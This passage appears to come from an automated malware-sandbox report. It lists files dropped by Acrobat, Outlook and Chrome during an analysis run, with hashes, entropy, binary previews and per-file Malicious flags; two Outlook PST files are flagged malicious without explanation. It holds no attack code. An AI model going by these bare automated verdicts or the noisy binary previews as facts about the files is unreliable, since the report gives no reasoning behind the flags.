                                                                                                                                              SHA-256:EFD84DCC1628766B5F3B22EFF52B11C67CA33E2EC4CBF22EA077849D156BA76E
                                                                                                                                              SHA-512:54A6D21A28596B81C2933ADA69252129E8358CB493EDA131CB5148F2DD25CE7F3BC976ADADD6B939EB6B8B3D90D07A2608DF78183C9535D8D3EB93DDB5871EBF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8720
                                                                                                                                              Entropy (8bit):1.8301465451248946
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:7M9WcRVbjVpOV6cV6+VZeVZvVZCVZW/Vk/Vhjv2ubCs22LCBvPxcLvqll2GL7msU:7UZnrFbtavqVmsU
                                                                                                                                              MD5:1448E56516BB69527C4D3CF00C751CF3
                                                                                                                                              SHA1:330113DFCB2BE8D3F9B7B9D4D3C0CFF904ADCCAD
                                                                                                                                              SHA-256:0BCA37544460846406B2B975ED2A335FC474FFAEE0B0102335826E00012DAF95
                                                                                                                                              SHA-512:039D0EC2B24C4FA9597F2E3532B6F531B4C7845BCD48DCE2B818667862C063D9B7B61081951A9BB52BDCA88570F64FC05A5AF2E43DB73C82995D81D2A9D9862C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.... .c......K~.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIe3a0f.LOG

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):246
                                                                                                                                              Entropy (8bit):3.5197430193686525
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8NlErN2l:Qw946cPbiOxDlbYnuRKdrN2l
                                                                                                                                              MD5:E80347035BA63D32312BF2BA7F5C9BAC
                                                                                                                                              SHA1:F9DCF42740AB2A733B110E9B7C7D74F5CDB89986
                                                                                                                                              SHA-256:3256C69F5CB6B07BCBF20B6A70C051FB8912A1C421335BD3224E7259F8D90110
                                                                                                                                              SHA-512:911061DD584B7EA08149EB86FBEFB83AFBE672A04F158227C7FFCC3673F12601AE14DF0FD957AD00B56323759D5BB4B2B96E01512E3DD0AA0B2C51BE46474B16
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.0.3./.2.0.2.5. . .1.6.:.5.7.:.0.7. .=.=.=.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250317T1656500495-7128.etl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):4.496782257541392
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:0veQA/UneKgB6eC10TwwybeZsUaC1VbEV2wx7MdeAVgRzFlyUSJuAmDkT9arEYJ4:CAF4apL95QbB3X3LI
                                                                                                                                              MD5:937C199F1A21341D624CCCA513CCC910
                                                                                                                                              SHA1:34ADB611BA2C505D2AC7F5A1CBE68E2570DDD320
                                                                                                                                              SHA-256:B196439E246D40A5D3E02A45D3C120704D1042F2D061F386F5A36EF9273B2063
                                                                                                                                              SHA-512:8C2559B6CDC1951901D5F8D3F918C6A118C9DBDA333DDACBA7B7171C7B8810D3F90E59FCA8AAB423FB5C4B713AE9B89ED9F418E8072691F080C7395A79CE29BB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:............................................................................d...................................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................B.6...........................v.2._.O.U.T.L.O.O.K.:.1.b.d.8.:.f.d.b.9.a.4.a.f.c.1.0.8.4.d.5.7.b.c.7.b.b.9.a.6.7.9.a.f.8.d.8.f...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.1.7.T.1.6.5.6.5.0.0.4.9.5.-.7.1.2.8...e.t.l...........P.P..........N......................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-17 16-57-01-433.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:ASCII text, with very long lines (393)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16525
                                                                                                                                              Entropy (8bit):5.359827924713262
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:yNDmLJAZYTtvEcrd/GVMimVRMTzpCeb9sJVPbvHktuFKr4Bnk2DfNSNq8iwyhZ9u:bAPaRH9E3/
                                                                                                                                              MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
                                                                                                                                              SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
                                                                                                                                              SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
                                                                                                                                              SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):15114
                                                                                                                                              Entropy (8bit):5.32935296006197
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:zqofyfDfKf0fJSH4SRSCSISZSvici8diCiAKbhP0J09cSJOJPJ8JTWcjcbcdc/HR:VX/
                                                                                                                                              MD5:0FD08C4540202C31E7133A83E4282D0A
                                                                                                                                              SHA1:F1033F53ABD89466EC3C167B93F989EC6C7B58E5
                                                                                                                                              SHA-256:C08C77B747DCF93D6534A03641B903BC98BA0C13ED253BF8D661F23D4110D375
                                                                                                                                              SHA-512:57952256EF3E4E1BB6F0FE06B38F8D64DE8C7CEE41490249E4262FE76A1E62E98279D7F510E2CAEFB41BE5F9CF85B0D79520171B6A25A230E807AF323875D50A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SessionID=947dae59-6d2d-4ff0-bee3-36eb9f0b50e5.1742245021451 Timestamp=2025-03-17T16:57:01:451-0400 ThreadID=3100 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=947dae59-6d2d-4ff0-bee3-36eb9f0b50e5.1742245021451 Timestamp=2025-03-17T16:57:01:458-0400 ThreadID=3100 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=947dae59-6d2d-4ff0-bee3-36eb9f0b50e5.1742245021451 Timestamp=2025-03-17T16:57:01:458-0400 ThreadID=3100 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=947dae59-6d2d-4ff0-bee3-36eb9f0b50e5.1742245021451 Timestamp=2025-03-17T16:57:01:458-0400 ThreadID=3100 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=947dae59-6d2d-4ff0-bee3-36eb9f0b50e5.1742245021451 Timestamp=2025-03-17T16:57:01:458-0400 ThreadID=3100 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):35721
                                                                                                                                              Entropy (8bit):5.425207229781566
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:fcbmI6ccb9cb+IqccbdcbIIl3cbXcbWIS+cb4cbIIJzcbkcbIIkqcb0Q:g6sqGlVS/JmkkQ
                                                                                                                                              MD5:16CDA2E71C4F39889E58D68012D89511
                                                                                                                                              SHA1:6943B3E927E3D5ACC8BB36AEF177A244B386B0ED
                                                                                                                                              SHA-256:7BCBE72BBA5823FBCC215DC1A8F174A6BEB6AE27C71F2940D4C7EDD4306F0F08
                                                                                                                                              SHA-512:1F21571CDB6D2BF673B1E35BEE0D6E674C59AF737EB98CB1FEB675427C82D8650D916E1BCFDF15D30F4EF5885254A81786E704C0A450F6E601C44CF26F03DAB7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\36f630ef-fa47-43b8-8563-c9e25f6885db.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):758601
                                                                                                                                              Entropy (8bit):7.98639316555857
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                              MD5:3A49135134665364308390AC398006F1
                                                                                                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\5d9db80c-99bc-4568-b338-b970bbda9e10.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1419751
                                                                                                                                              Entropy (8bit):7.976496077007677
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:/x0WL07oSwYIGNPUGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:J0WLxSwZG6GZn3mlind9i4ufFXpAXkru
                                                                                                                                              MD5:4EC58430C65824A32086E0F4F7675101
                                                                                                                                              SHA1:470A2A9C8F79388F616B90F8F1C5C4F284239C0D
                                                                                                                                              SHA-256:FA403E63859816820EC59D0A9FF7FDB6E783A86E107DF418A487755D1BE7BB53
                                                                                                                                              SHA-512:1CEA8294D2B70EE00F6EF0F82195F1389685C22587D765CC4BDAFBBD6E114BB259C8121E3FB29AC8457C5C02E898196838DEEAD8CA06F80856CEFEFF30902B66
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\5deccf84-d272-4a3a-8d01-109aa48c0a4e.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 160932
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):208828
                                                                                                                                              Entropy (8bit):7.9773701100328
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:3+4q5E8LxO+ExK/adDBgI81ReWQ53+sQ3T521bG8vHyd:ONh3P6D+Tegs6121bbvHs
                                                                                                                                              MD5:F2054DE97AA3E82A99E23D472DA05CD7
                                                                                                                                              SHA1:50FCC980E7A092E8E34276D1C820645A8D5E51BB
                                                                                                                                              SHA-256:C68DF42079E0B101594AEB8016AC5D953DD530E45811DD14D3B950230E193930
                                                                                                                                              SHA-512:5758C4D13FBFAE9A9E03AFB934DF4068F6AF3AA929D9972D10A967608621284BF71CD63573BA5769244F5CA49A5C7B2D2DCFB01BD881ED2F876BF09C52B6C5F6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\91af2ea9-5e87-4db6-9b43-be32f4f5c149.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1407294
                                                                                                                                              Entropy (8bit):7.97605879016224
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                                                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                                                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                                                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                                                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\9b92333f-76d3-46a4-85d1-a6bfc28949c2.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):386528
                                                                                                                                              Entropy (8bit):7.9736851559892425
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                                                                              C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                              File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):271360
                                                                                                                                              Entropy (8bit):4.991743623274022
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:lTyy/k7so083+ZR+uPMd7efecYiisHL+E+rTF+r2br+JaG+2EU/ca+FH++GZF+kv:FXkb3zvGMjfaT/WzCftmp9
                                                                                                                                              MD5:D111C1894CDF9BD00F533D2B60F2EFD6
                                                                                                                                              SHA1:4AA15B04C76F3CD44A4C0C36B5243180CDA72BC9
                                                                                                                                              SHA-256:3E1D27ACCEBA9A0EEA05AE5FE9135F87E866AB9B92EC2A6FB6D7CECB98618BA4
                                                                                                                                              SHA-512:E1409626026183DD2701744F75DD868B466742CEB2623213839DF56FD1E662D67BA4EFC31B91BDA1896CF6CF7FBB71B0ECCE9186A14E884483A54F55CB732AC2
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:!BDN.U.SM......\...a...........<.......a................@...........@...@...................................@...........................................................................$.......D......@X..............;...............8...........................................................................................................................................................................................................................................................................................p...........XZ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):262144
                                                                                                                                              Entropy (8bit):4.845335658460126
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:K/EfloX4zHMW1ezXlQW083+ZR+uPMx7efecYiisHL+E+rTH+r2br+JaG+OEU/caG:KWzHycCfGM1WaT0TPp9J
                                                                                                                                              MD5:EA6B881971DB74CD7F18FBB1D150A58B
                                                                                                                                              SHA1:0385404487D3630C9BD60FC8346A315987A1B785
                                                                                                                                              SHA-256:9BE662FD33756B893AB5567E882FC7A8F823582AFB825B1CC71226B263191D8C
                                                                                                                                              SHA-512:CC7AB2E3911FE4B8810665D97FA552E07900F93D4480519924560CDA41A0596F15EE33BE15B12289B1F9E62873FA338B2711C61853305E18D036FA969515DC13
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:xr..C...Y....................................#.!BDN.U.SM......\...a...........<.......a................@...........@...@...................................@...........................................................................$.......D......@X..............;...............8...........................................................................................................................................................................................................................................................................................p...........XZ..............B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              Chrome Cache Entry: 188

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):10796
                                                                                                                                              Entropy (8bit):7.946024875001343
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                                                                                                              MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                              SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                              SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                              SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
